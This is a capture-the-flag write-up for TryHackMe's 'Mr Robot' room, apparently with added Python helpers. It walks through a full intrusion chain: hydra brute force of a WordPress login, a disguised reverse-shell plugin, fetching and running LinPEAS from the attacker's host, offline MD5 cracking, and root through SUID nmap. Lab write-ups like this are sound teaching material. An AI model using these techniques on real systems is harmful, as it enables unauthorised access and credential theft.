MrRobot THM Writeup

This is the first write-up I have done in a while and the first I have done for THM! This one is quite long, as there are a few more steps with it being rated an intermediate room, but if you work through it logically you can do it!

Tools Used

If you need help finding these, please check out my links page; the ones I've listed are the ones that don't come by default with Kali.

PHP Reverse Shell

LinPEAS

Burp Suite (if you're unsure how to use it, please complete the room THM has on it)

CrackStation.net

Brief

From the brief there was not much to gain, other than that there are 3 flags to capture and they are listed as key 1 etc. I'm guessing they won't be called that. Having never watched Mr Robot, I'm hoping this doesn't put me at a disadvantage.

Enumeration

Like all CTFs, I started out with my nmap scan using my usual syntax (-sC for the default scripts, -sV for version detection, -Pn to skip host discovery and -oN to save the plain-text output):

nmap -sC -Pn -sV -oN ./nmap/initial <TARGET_IP>

nmap returned these results:

[Screenshot: nmap results]

So it looks like my main way in is going to be through the website.

The website runs a console-emulation program; from the interaction when it loaded I knew this was a honeypot, so I decided to try another way.

I ran a Gobuster scan using the syntax below (-x adds the extensions to every word in the list):

gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirbuster/big.txt -x html,php,txt

From this scan I found quite a few directories; the two I'm interested in, though, are robots.txt and wp-login.

Going to the robots.txt file I found two interesting entries.

[Screenshot: robots.txt contents]

Well, key 1 of 3 sounds great, so I opened that and got my first key. I then downloaded the .dic file.

From reading it I could tell it was a genuine dictionary file, so I'm guessing some password cracking is coming up. Note that the list is padded with a huge number of repeated lines, so it is worth deduplicating it before pointing any brute-forcer at it; the attack gets the same result in a fraction of the requests.

WordPress Login

So, on to the wp-login page.

I knew from looking at this that I didn't have a username or password, so after a quick check of the page source for any names in code comments or messages, I decided to use the dictionary to find the username and password.

[Screenshot: WordPress login page]

Luckily, it gives an error telling me the username was invalid. WordPress returns a different message for an unknown username than for a wrong password, which turns the login form into a username-enumeration oracle. I captured the login request with Burp Suite and got the below.

[Screenshot: login request captured in Burp Suite]

That last line is exactly what I'm looking for, so I can build my hydra command. -L takes the username list, -p fixes a single dummy password and F= gives the string that marks a failed guess:

hydra -L fsocity.dic -p guessing <TARGET_IP> http-post-form "/wp-login/:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F<TARGET_IP>%2Fwp-admin%2F&testcookie=1:F=Invalid username"

Hydra came back really quickly and I had the username.

[Screenshot: hydra output showing the username]

Now, with a slight change to the hydra syntax (-l for the single username, -P for the password list, and S=302 because a successful login answers with a redirect), I've got the password too!

hydra -l Elliot -P fsocity.dic <TARGET_IP> http-post-form "/wp-login/:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F<TARGET_IP>%2Fwp-admin%2F&testcookie=1:S=302"

And we are logged in!!

[Screenshot: successful login]
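The two hydra runs above, replayed offline as an added example (my code, not the original post's and not hydra). It reproduces the logic both runs depend on: wp-login.php answers an unknown username with an "Invalid username" error, a known username with the wrong password with a different error, and a correct pair with a 302 redirect. The fake target, its single account and the wordlist are constructed for the demo, and the error strings are modelled on what the write-up observed rather than copied from any WordPress release.

```python
"""Two-stage WordPress login attack against a constructed target.

Stage 1 finds a valid username by watching for the absence of the failure
string (hydra's F=), stage 2 finds its password by watching for the redirect
(hydra's S=302). Deduplicating the wordlist first is what makes the real
fsocity.dic usable.
"""
from dataclasses import dataclass
from typing import Callable, Iterable, List, Optional, Tuple


@dataclass
class Response:
    status: int
    body: str


# Constructed account on the fake target; the real password is not on this page.
_FAKE_USERS = {"elliot": "s3cr3t-pass"}
REQUESTS_SENT = {"count": 0}   # lets the demo show what deduplication saves


def fake_wp_login(log: str, pwd: str) -> Response:
    """Stand-in for POST /wp-login.php with the three observable outcomes."""
    REQUESTS_SENT["count"] += 1
    if log.lower() not in _FAKE_USERS:
        return Response(200, "<strong>ERROR</strong>: Invalid username.")
    if _FAKE_USERS[log.lower()] != pwd:
        return Response(200, "<strong>ERROR</strong>: The password you entered "
                             f"for the username {log} is incorrect.")
    return Response(302, "")   # the real thing sends Location: /wp-admin/


LoginFn = Callable[[str, str], Response]


def dedupe(wordlist: Iterable[str]) -> List[str]:
    """fsocity.dic is mostly repeated lines and hydra would send every one of
    them. Keep first occurrences in order (what `sort -u` gives, minus the sort)."""
    seen, out = set(), []
    for word in wordlist:
        word = word.strip()
        if word and word not in seen:
            seen.add(word)
            out.append(word)
    return out


def find_username(login: LoginFn, wordlist: Iterable[str],
                  fail_marker: str = "Invalid username") -> Optional[str]:
    """Stage 1, `hydra -L list -p guessing ... F=Invalid username`: the first
    candidate whose response lacks the failure marker is a real account."""
    for cand in dedupe(wordlist):
        if fail_marker not in login(cand, "guessing").body:
            return cand
    return None


def find_password(login: LoginFn, username: str, wordlist: Iterable[str],
                  success_status: int = 302) -> Optional[str]:
    """Stage 2, `hydra -l user -P list ... S=302`: a redirect means success."""
    for cand in dedupe(wordlist):
        if login(username, cand).status == success_status:
            return cand
    return None


def attack(login: LoginFn, wordlist: Iterable[str]) -> Optional[Tuple[str, str]]:
    """Run both stages with the same list, as the write-up did."""
    words = list(wordlist)
    user = find_username(login, words)
    if user is None:
        return None
    password = find_password(login, user, words)
    return None if password is None else (user, password)


# Constructed wordlist; the repeats mimic the padding in fsocity.dic.
SAMPLE_WORDLIST = ["true", "false", "true", "wordpress", "Elliot", "true",
                   "Elliot", "s3cr3t-pass", "admin", "false"]

if __name__ == "__main__":
    print(attack(fake_wp_login, SAMPLE_WORDLIST),
          "after", REQUESTS_SENT["count"], "requests")
```

Against a live target, swap fake_wp_login for a function that POSTs the fields captured in Burp (log, pwd, wp-submit, redirect_to, testcookie) and returns the status code and body; the two stages stay the same. The request counter is there to make the point about deduplication visible: the raw file costs many times more requests for the same answer.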

Getting a Shell

So, I appreciate that at this point there are a few different ways I could do this, and a few went through my head, but I decided to install a PHP reverse shell packaged as a WordPress plugin: an administrator can upload and activate plugins, and WordPress executes the PHP inside them, so that is all the code execution we need.

If you don't have one already made, that's fine: use the PHP Reverse Shell from Pentest Monkey and paste the block below in at line 2, directly after the opening <?php tag, where the file's own comment block starts.

If you're using it for the first time, scroll down and change the IP address to your IP and the port to whatever port you want your listener on.

/*
Plugin Name:  Super Safe Plugin
Plugin URI: http://mindyour.biz
Description: This is super not suspicious
Version: 1.0
Author: Trustworthy Person
Author URI: http://trust.me
Text Domain: shell
Domain Path: /languages
*/

Zip the file, then upload it into WordPress as a plugin (Plugins > Add New > Upload Plugin), but don't activate it just yet. WordPress only needs the Plugin Name line to recognise the file as a plugin; the rest of the header is cosmetic.

[Screenshot: uploading the plugin in WordPress]
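The packaging step above as an added example (my code, not the post's and not pentestmonkey's). It inserts the header from the write-up at line 2, rewrites the $ip/$port assignments so the "change this" step cannot be forgotten, and packs the result as shell/shell.php in a zip ready to upload. Assumptions: a listener at 10.10.14.5:9002, the plugin slug "shell", and a constructed stub standing in for the real php-reverse-shell.php that keeps only the `<?php` opener and the two `$ip`/`$port` lines that file carries.

```python
"""Turn a PHP reverse shell into a WordPress plugin zip.

WordPress treats any PHP file whose leading comment carries a "Plugin Name:"
line as a plugin, so the header goes straight after <?php. The archive layout
<slug>/<slug>.php is the one the plugin uploader expects.
"""
import io
import re
import zipfile

# Header from the write-up, verbatim.
PLUGIN_HEADER = """/*
Plugin Name:  Super Safe Plugin
Plugin URI: http://mindyour.biz
Description: This is super not suspicious
Version: 1.0
Author: Trustworthy Person
Author URI: http://trust.me
Text Domain: shell
Domain Path: /languages
*/
"""

# Constructed stand-in for php-reverse-shell.php. The real file also opens with
# `<?php` and contains `$ip = '127.0.0.1';  // CHANGE THIS` and
# `$port = 1234;       // CHANGE THIS`; the payload itself is left out here.
STUB_SHELL = """<?php
// payload omitted in this constructed stub
set_time_limit (0);
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
// payload continues...
"""

IP_LINE = re.compile(r"^\$ip\s*=\s*'[^']*';", re.M)
PORT_LINE = re.compile(r"^\$port\s*=\s*\d+;", re.M)


def prepare_plugin_source(php_src: str, lhost: str, lport: int) -> str:
    """Insert the plugin header at line 2 and point the shell at lhost:lport."""
    lines = php_src.split("\n")
    if not lines or not lines[0].strip().startswith("<?php"):
        raise ValueError("expected <?php on line 1")
    src = lines[0] + "\n" + PLUGIN_HEADER + "\n".join(lines[1:])
    src, n_ip = IP_LINE.subn(f"$ip = '{lhost}';", src)
    src, n_port = PORT_LINE.subn(f"$port = {int(lport)};", src)
    if n_ip != 1 or n_port != 1:
        raise ValueError(f"expected one $ip and one $port line, found {n_ip}/{n_port}")
    return src


def build_plugin_zip(php_src: str, lhost: str, lport: int, slug: str = "shell") -> bytes:
    """Return zip bytes containing <slug>/<slug>.php."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{slug}/{slug}.php", prepare_plugin_source(php_src, lhost, lport))
    return buf.getvalue()


def plugin_files(zip_bytes: bytes) -> dict:
    """Read the archive back, to check the result before uploading it."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return {name: zf.read(name).decode() for name in zf.namelist()}


if __name__ == "__main__":
    data = build_plugin_zip(STUB_SHELL, "10.10.14.5", 9002)
    with open("shell.zip", "wb") as fh:
        fh.write(data)
    print(plugin_files(data)["shell/shell.php"])
```

Feed it the real php-reverse-shell.php contents instead of STUB_SHELL and the output zip is what the Upload Plugin page wants. The two ValueError checks are deliberate: a file without the <?php opener or without exactly one $ip and one $port line is not the shell you think it is, and it is better to find that out before the upload than after the activation.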

We need to set up a listener first on our Kali machine (or whatever machine you're using). 9002 is the port I set within my PHP reverse shell.

nc -lvnp 9002
[Screenshot: netcat listener]

Once the listener is up, I can click "Activate" on the WordPress page and I've got my shell.

[Screenshot: successful reverse shell]

From here I'm going to find what I can access. I decided to start with the home directories; there was only one user, though.

cd /home
cd robot

In here I found two files: one was the key, which I tried to read but couldn't because of its permissions (it belongs to robot); the other a very vulnerable-looking MD5!

[Screenshot: directory listing of /home/robot]

Well, since it is named md5, I'm going with this being MD5. I could have put it through Hashcat (mode 0 is raw MD5), but in all seriousness I used CrackStation just because it was quicker to copy what I had in front of me into there. Outside a CTF, think before pasting a hash into a third-party site: you are handing someone else's service a real credential.

[Screenshot: CrackStation cracking the MD5]

That took literally no time at all and I've got the password for the robot account. An unsalted MD5 of a dictionary word is exactly the case precomputed tables and wordlist attacks are built for.
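A local equivalent of the CrackStation step, as an added example (my code, not the post's): a dictionary attack on a user:hash file of raw MD5s, the same job `hashcat -m 0` does at speed. The sample line is constructed; its digest is the RFC 1321 test vector MD5("abcdefghijklmnopqrstuvwxyz"), chosen so the result can be checked without stating anything about the real box's hash.

```python
"""Dictionary attack on unsalted MD5 digests in a user:hash file.

There is no salt to vary, so one MD5 per candidate word settles every user in
the file at once; that is why a raw MD5 of a dictionary word falls instantly.
"""
import hashlib
from typing import Iterable, List, Optional, Tuple

SAMPLE_FILE = "robot:c3fcd3d76192e4007dfb496cca67e13b\n"   # constructed input
SAMPLE_WORDLIST = ["password", "robot", "qwerty",
                   "abcdefghijklmnopqrstuvwxyz", "letmein"]  # constructed input

HEX = set("0123456789abcdef")


def parse_user_hash(text: str) -> List[Tuple[str, str]]:
    """Parse `user:hexdigest` lines; reject anything that is not a 32-hex raw MD5."""
    out = []
    for line in text.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        user, digest = line.split(":", 1)
        digest = digest.strip().lower()
        if len(digest) != 32 or set(digest) - HEX:
            raise ValueError(f"not a raw MD5 digest for {user!r}: {digest!r}")
        out.append((user.strip(), digest))
    return out


def crack_md5(target_hex: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose MD5 matches, or None if the list misses."""
    target = target_hex.lower()
    for cand in wordlist:
        cand = cand.rstrip("\r\n")
        if hashlib.md5(cand.encode()).hexdigest() == target:
            return cand
    return None


def crack_file(text: str, wordlist: Iterable[str]) -> dict:
    """Crack every user in a user:hash file; None where the wordlist misses."""
    words = list(wordlist)
    return {user: crack_md5(digest, words)
            for user, digest in parse_user_hash(text)}


if __name__ == "__main__":
    print(crack_file(SAMPLE_FILE, SAMPLE_WORDLIST))
```

Swap SAMPLE_FILE for the contents of the file in /home/robot and SAMPLE_WORDLIST for an open-file iterator over fsocity.dic (or rockyou) and it does the same job locally; the parser's length and hex checks stop you from spending a wordlist on something that was never a raw MD5 in the first place.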

This is where I ran into a snag: I couldn't use su in my current shell, because su refuses to run without a terminal, so I need to upgrade my shell before I can switch user and escalate my privileges.

Time for Upgrades!

So my plan from this point forward: upgrade my shell, switch to the robot user, then escalate my privileges.

I learnt a really quick way to do this from an article by ropnop, which is in my useful links; if you didn't know how to do this, I really want you to go read the link and learn it!

python -c 'import pty; pty.spawn("/bin/bash")'
[Screenshot: upgrading the shell]

That gives the shell a real tty, which is all su needs. From there I could su to robot with the cracked password and get key 2! (If the box has no python binary, the same one-liner works with python3.)

PrivEsc

So now I had my user account. I was working on the assumption that the final flag was in /root, as I couldn't access it!!

I decided to use LinPEAS, so I served it over HTTP from a web server started in the folder I had it saved in, to make it easier.

This is where something like Tilix really helps, as you can easily have your web server running in the same console window.

To start the web server, run this command from a terminal that is not your reverse shell, in the directory containing linpeas.sh. The module name is case sensitive and it serves the current directory on port 8000 by default (on Python 2 the equivalent is python -m SimpleHTTPServer, which fails on Python 3 because the module was renamed).

python3 -m http.server

Then, in your reverse shell, first move into the temp folder with

cd /tmp

Once in /tmp, again in your reverse shell, use the command below to download LinPEAS onto the target (the port is 8000 unless you changed it).

wget http://<your_ip>:<your_port>/linpeas.sh

Once it has downloaded, LinPEAS needs marking as executable with

chmod +x linpeas.sh

It can then be run with

./linpeas.sh

Once this has run there is a lot of information. I usually go to the SUID section first for privesc, and on our target this is what it came back with.

[Screenshot: LinPEAS SUID output]

When LinPEAS marks something in yellow, you know it's got to be good. Even without that, nmap being SUID root stands out: any SUID-root binary that can spawn a shell or run arbitrary commands hands you root, and GTFOBins is the quick reference for which ones can.
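The SUID check itself, as an added example (my code, not the post's and not LinPEAS's). From a shell the same sweep is `find / -perm -4000 -type f 2>/dev/null`; this version also flags binaries whose names appear on a small hand-picked subset of GTFOBins' SUID list, which is why nmap would stand out. demo_tree() builds a constructed directory with one fake SUID nmap so the functions can be exercised without root.

```python
"""Manual SUID sweep with a shortlist of known shell escapes.

find_suid walks a tree and reports regular files with the setuid bit and their
owner; known_escapes keeps the ones worth reading GTFOBins for. Only root-owned
ones matter by default, because that is the uid the spawned shell inherits.
"""
import os
import stat
import tempfile
from typing import List, Tuple

# Hand-picked subset of GTFOBins SUID entries, not the full list.
KNOWN_ESCAPES = {"nmap", "find", "vim", "python", "perl", "bash", "less",
                 "more", "awk", "cp", "env", "php"}


def find_suid(root: str) -> List[Tuple[str, int]]:
    """Return (path, owner uid) for every regular file under root with the
    setuid bit. Symlinks are skipped (lstat) and unreadable paths ignored."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append((path, st.st_uid))
    return hits


def known_escapes(hits: List[Tuple[str, int]], root_only: bool = True) -> List[str]:
    """Filter hits to binaries on the escape list; root-owned only by default."""
    return [path for path, uid in hits
            if (uid == 0 or not root_only)
            and os.path.basename(path) in KNOWN_ESCAPES]


def demo_tree() -> str:
    """Constructed tree: a fake SUID nmap next to a normal binary."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    bindir = os.path.join(root, "usr", "local", "bin")
    os.makedirs(bindir)
    for name, mode in (("nmap", 0o4755), ("ls", 0o755)):
        path = os.path.join(bindir, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    hits = find_suid("/")
    for path, uid in hits:
        print(f"{uid:>6} {path}")
    print("worth a look:", known_escapes(hits))
```

On a real box run it from the upgraded shell with root "/" and read GTFOBins for anything it prints under "worth a look"; owner uid 0 is the important part, since a SUID binary owned by an unprivileged user only gets you that user.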

So I checked the version just by typing nmap at the command line and found it was version 3.81. Didn't some previous versions have an interactive mode?

nmap --interactive

I used that and it did indeed have interactive mode available (later nmap releases removed it, which is why this only works on an old build like this one).

It was then a simple command to get a shell:

!sh
[Screenshot: nmap in interactive mode]

So let's go to /root and see what we find. Run id first to confirm where you landed: nmap is SUID root, so the sh it spawns has an effective UID of 0. Had it spawned bash instead, bash would drop that privilege unless started with -p.

[Screenshot: final key in /root]

And we have our final key!!

Conclusion

I realise this is probably a long write-up, but I wanted to cover everything just in case anyone reading was having trouble with this room.

I really liked this room, as it tries to grab your attention with the website first, and once you're past that it uses a lot of different skills which, if you didn't already have them, would be a great way to learn.

Thanks to Ben at TryHackMe for the challenge!